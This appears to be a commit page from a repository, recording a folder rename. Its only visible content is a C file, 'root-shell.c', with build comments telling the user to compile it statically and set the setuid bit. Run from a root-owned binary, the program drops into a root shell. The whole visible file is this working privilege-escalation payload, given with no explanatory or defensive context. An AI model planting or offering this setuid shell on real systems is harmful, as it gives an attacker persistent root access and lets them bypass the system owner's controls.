Rename folders

This commit is contained in:
Mo Langning
2024-04-05 10:42:21 +00:00
parent 997dca7afc
commit 73f78c4133
271 changed files with 0 additions and 0 deletions
@@ -0,0 +1,12 @@
// $ gcc -static -o root-shell root-shell.c
// $ chmod u+s root-shell
#include <unistd.h>
#include <stdlib.h>
int main(void) {
setuid(0);
setgid(0);
system("/bin/sh");
return 0;
}